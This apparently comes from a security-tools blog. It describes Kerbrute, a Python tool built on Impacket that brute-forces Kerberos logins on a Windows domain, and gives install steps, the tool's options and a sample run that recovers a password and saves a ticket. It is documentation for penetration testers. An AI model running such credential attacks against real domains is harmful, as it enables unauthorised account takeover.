Kali Linux

Kerbrute : An Script To Perform Kerberos Bruteforcing By Using Impacket

Kerbrute is a script to perform kerberos bruteforcing by using the Impacket library.

When is executed, as input it receives a user or list of users and a password or list of password. Then is performs a brute-force attack to enumerate:

  • Valid username/passwords pairs
  • Valid usernames
  • Usernames without pre-authentication required

As a result, the script generates a list of valid credentials discovered, and the TGT’s generated due those valid credentials.

Installation

From pypi:

pip3 install kerbrute

From repo:

git clone https://github.com/TarlogicSecurity/kerbrute
cd kerbrute
pip install -r requirements.txt

Use

Help without arguments:

root@kali:~# kerbrute
Impacket v0.9.18 – Copyright 2018 SecureAuth Corporation
usage: kerbrute.py [-h] [-debug] (-user USER | -users USERS)
[-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN
[-dc-ip ] [-threads THREADS]
[-outputfile OUTPUTFILE] [-no-save-ticket]
optional arguments:
-h, –help show this help message and exit
-debug Turn DEBUG output ON
-user USER User to perform bruteforcing
-users USERS File with user per line
-password PASSWORD Password to perform bruteforcing
-passwords PASSWORDS File with password per line
-domain DOMAIN Domain to perform bruteforcing
-dc-ip IP Address of the domain controller
-threads THREADS Number of threads to perform bruteforcing. Default = 1
-outputfile OUTPUTFILE
File to save discovered user:password
-no-save-ticket Do not save retrieved TGTs with correct credentials
Examples:
./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com

Example of execution:

root@kali:~# kerbrute -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
Impacket v0.9.18 – Copyright 2018 SecureAuth Corporation
[] Stupendous => triceratops:Sh4rpH0rns [] Saved TGT in triceratops.ccache
[] Valid user => velociraptor [NOT PREAUTH] [] Valid user => trex
[*] Saved discovered passwords in jurassic_passwords.txt

R K

Recent Posts

Kali Linux 2024.4 Released, What’s New?

Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…

6 hours ago

Lifetime-Amsi-EtwPatch : Disabling PowerShell’s AMSI And ETW Protections

This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…

6 hours ago

GPOHunter – Active Directory Group Policy Security Analyzer

GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…

2 days ago

2024 MITRE ATT&CK Evaluation Results – Cynet Became a Leader With 100% Detection & Protection

Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…

5 days ago

SecHub : Streamlining Security Across Software Development Lifecycles

The free and open-source security platform SecHub, provides a central API to test software with…

1 week ago

Hawker : The Comprehensive OSINT Toolkit For Cybersecurity Professionals

Don't worry if there are any bugs in the tool, we will try to fix…

1 week ago